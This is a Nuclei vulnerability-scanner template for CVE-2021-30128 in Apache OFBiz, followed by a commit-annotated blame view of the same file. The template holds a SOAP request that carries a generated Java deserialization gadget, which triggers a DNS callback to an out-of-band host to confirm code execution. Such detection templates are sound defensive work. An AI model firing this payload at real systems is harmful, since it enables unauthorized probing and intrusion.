nuclei-templates/http/cves/2021/CVE-2021-30128.yaml

id: CVE-2021-30128

info:
  name: Apache OFBiz <17.12.07 - Arbitrary Code Execution
  author: For3stCo1d
  severity: critical
  description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.
  remediation: |
    Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability.
  reference:
    - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30128
    - http://www.openwall.com/lists/oss-security/2021/04/27/5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-30128
    cwe-id: CWE-502
    epss-score: 0.19253
    epss-percentile: 0.95706
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: ofbiz
    fofa-query: app="Apache_OFBiz"
  tags: cve,cve2021,apache,ofbiz,deserialization,rce

http:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
          <soapenv:Header/>
            <soapenv:Body>
              <ser>
                <map-Map>
                  <map-Entry>
                    <map-Key>
                      <cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
                    </map-Key>
                  <map-Value>
                <std-String/>
                </map-Value>
                </map-Entry>
              </map-Map>
              </ser>
            </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'value="errorMessage"'

# digest: 490a0046304402205ec600f6a53e4c83aecc30992f2a252cb46e3a835e96b5f83f541e23c807110702203234032602fa3296b1f1d012e6e00fd3b26c85abad0cbc8e5a607cd195e4472e:922c64590222798bb761d5b6d8e72950
Create CVE-2021-30128.yaml 2022-11-05 15:08:43 +00:00			`id: CVE-2021-30128`

			`info:`
			`name: Apache OFBiz <17.12.07 - Arbitrary Code Execution`
			`author: For3stCo1d`
			`severity: critical`
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net> 2023-03-27 17:46:47 +00:00			`description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`remediation: \|`
			`Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability.`
Create CVE-2021-30128.yaml 2022-11-05 15:08:43 +00:00			`reference:`
			`- https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E`
Auto Generated CVE annotations [Thu Jan 5 11:21:19 UTC 2023] :robot: 2023-01-05 11:21:19 +00:00			`- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E`
			`- https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E`
Dashboard Content Enhancements (#6965) * Add description and enhance one where the UI failed to save properly. dos2unix on a template * Change cvedetails link to nvd * make severities match * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2017/CVE-2017-14524.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2019/CVE-2019-16759.yaml by md * Enhancement: cves/2021/CVE-2021-22986.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24145.yaml by md * Enhancement: cves/2021/CVE-2021-24347.yaml by md * Enhancement: cves/2021/CVE-2021-25003.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25296.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-25298.yaml by md * Enhancement: cves/2021/CVE-2021-25297.yaml by md * Enhancement: cves/2021/CVE-2021-28151.yaml by md * Enhancement: cves/2021/CVE-2021-30128.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0824.yaml by md * Enhancement: cves/2022/CVE-2022-0885.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-24816.yaml by md * Enhancement: cves/2022/CVE-2022-31499.yaml by md * Enhancement: cves/2022/CVE-2022-21587.yaml by md * Enhancement: cves/2021/CVE-2021-24155.yaml by md * Enhancement: cves/2017/CVE-2017-5638.yaml by md * Enhancement: cves/2015/CVE-2015-2863.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-2314.yaml by md * Enhancement: cves/2022/CVE-2022-33901.yaml by md * Enhancement: cves/2022/CVE-2022-34753.yaml by md * Enhancement: cves/2022/CVE-2022-39952.yaml by md * Enhancement: cves/2022/CVE-2022-4060.yaml by md * Enhancement: cves/2022/CVE-2022-44877.yaml by md * Enhancement: cves/2023/CVE-2023-0669.yaml by md * Enhancement: cves/2023/CVE-2023-26255.yaml by md * Enhancement: cves/2023/CVE-2023-26256.yaml by md * Enhancement: exposures/files/salesforce-credentials.yaml by md * Enhancement: misconfiguration/hadoop-unauth-rce.yaml by md * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by md * Enhancement: network/backdoor/backdoored-zte.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: network/detection/ibm-d2b-database-server.yaml by md * Enhancement: technologies/oracle/oracle-atg-commerce.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-abuseipdb.yaml by md * Enhancement: token-spray/api-dbt.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-rce.yaml by md * Enhancement: vulnerabilities/avaya/avaya-aura-xss.yaml by md * Enhancement: vulnerabilities/cisco/cisco-cloudcenter-suite-rce.yaml by md * Enhancement: vulnerabilities/froxlor-xss.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/jamf/jamf-log4j-jndi-rce.yaml by md * Enhancement: vulnerabilities/opencpu/opencpu-rce.yaml by md * Enhancement: vulnerabilities/other/academy-lms-xss.yaml by md * Enhancement: vulnerabilities/other/caucho-resin-info-disclosure.yaml by md * Enhancement: vulnerabilities/other/ckan-dom-based-xss.yaml by md * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by md * Enhancement: vulnerabilities/other/graylog-log4j.yaml by md * Enhancement: vulnerabilities/mobileiron/mobileiron-log4j-jndi-rce.yaml by md * Initial cleanups for syntax errors * dashboard gremlins * Add log4j back to name * Enhancement: exposures/files/salesforce-credentials.yaml by cs * Enhancement: misconfiguration/installer/nopcommerce-installer.yaml by cs * Enhancement: network/backdoor/backdoored-zte.yaml by cs * Enhancement: vulnerabilities/other/couchdb-adminparty.yaml by cs * Sev and other info tweaks * Merge conflict --------- Co-authored-by: sullo <sullo@cirt.net> 2023-03-27 17:46:47 +00:00			`- https://nvd.nist.gov/vuln/detail/CVE-2021-30128`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`- http://www.openwall.com/lists/oss-security/2021/04/27/5`
Update CVE-2021-30128.yaml 2022-12-23 09:10:25 +00:00			`classification:`
Auto Generated CVE annotations [Thu Jan 5 11:21:19 UTC 2023] :robot: 2023-01-05 11:21:19 +00:00			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`
			`cvss-score: 9.8`
Update CVE-2021-30128.yaml 2022-12-23 09:10:25 +00:00			`cve-id: CVE-2021-30128`
Auto Generated CVE annotations [Thu Jan 5 11:21:19 UTC 2023] :robot: 2023-01-05 11:21:19 +00:00			`cwe-id: CWE-502`
TemplateMan Update [Wed Oct 25 06:44:12 UTC 2023] :robot: 2023-10-25 06:44:12 +00:00			`epss-score: 0.19253`
TemplateMan Update [Sun Nov 5 22:23:39 UTC 2023] :robot: 2023-11-05 22:23:39 +00:00			`epss-percentile: 0.95706`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`cpe: cpe:2.3:a:apache:ofbiz::::::::`
Create CVE-2021-30128.yaml 2022-11-05 15:08:43 +00:00			`metadata:`
boolean format update 2023-06-04 08:13:42 +00:00			`verified: true`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`max-request: 1`
CVE Enrichment :tada: 2023-07-11 19:49:27 +00:00			`vendor: apache`
			`product: ofbiz`
Updated 2021 CVEs 2023-09-06 12:09:01 +00:00			`fofa-query: app="Apache_OFBiz"`
Create CVE-2021-30128.yaml 2022-11-05 15:08:43 +00:00			`tags: cve,cve2021,apache,ofbiz,deserialization,rce`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create CVE-2021-30128.yaml 2022-11-05 15:08:43 +00:00			`- raw:`
			`- \|`
			`POST /webtools/control/SOAPService HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: text/xml`

Update CVE-2021-30128.yaml 2022-12-16 12:55:42 +00:00			`<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">`
			`<soapenv:Header/>`
Create CVE-2021-30128.yaml 2022-11-05 15:08:43 +00:00			`<soapenv:Body>`
			`<ser>`
			`<map-Map>`
			`<map-Entry>`
			`<map-Key>`
			`<cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>`
Update CVE-2021-30128.yaml 2022-12-16 12:55:42 +00:00			`</map-Key>`
			`<map-Value>`
Create CVE-2021-30128.yaml 2022-11-05 15:08:43 +00:00			`<std-String/>`
			`</map-Value>`
			`</map-Entry>`
			`</map-Map>`
			`</ser>`
			`</soapenv:Body>`
			`</soapenv:Envelope>`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
Update CVE-2021-30128.yaml 2022-12-23 09:10:25 +00:00			`part: interactsh_protocol`
Create CVE-2021-30128.yaml 2022-11-05 15:08:43 +00:00			`words:`
			`- "dns"`

			`- type: word`
			`part: body`
			`words:`
Update CVE-2021-30128.yaml 2022-12-23 09:10:25 +00:00			`- 'value="errorMessage"'`
TemplateMan Update [Mon Nov 6 09:19:20 UTC 2023] :robot: 2023-11-06 09:19:20 +00:00
			`# digest: 490a0046304402205ec600f6a53e4c83aecc30992f2a252cb46e3a835e96b5f83f541e23c807110702203234032602fa3296b1f1d012e6e00fd3b26c85abad0cbc8e5a607cd195e4472e:922c64590222798bb761d5b6d8e72950`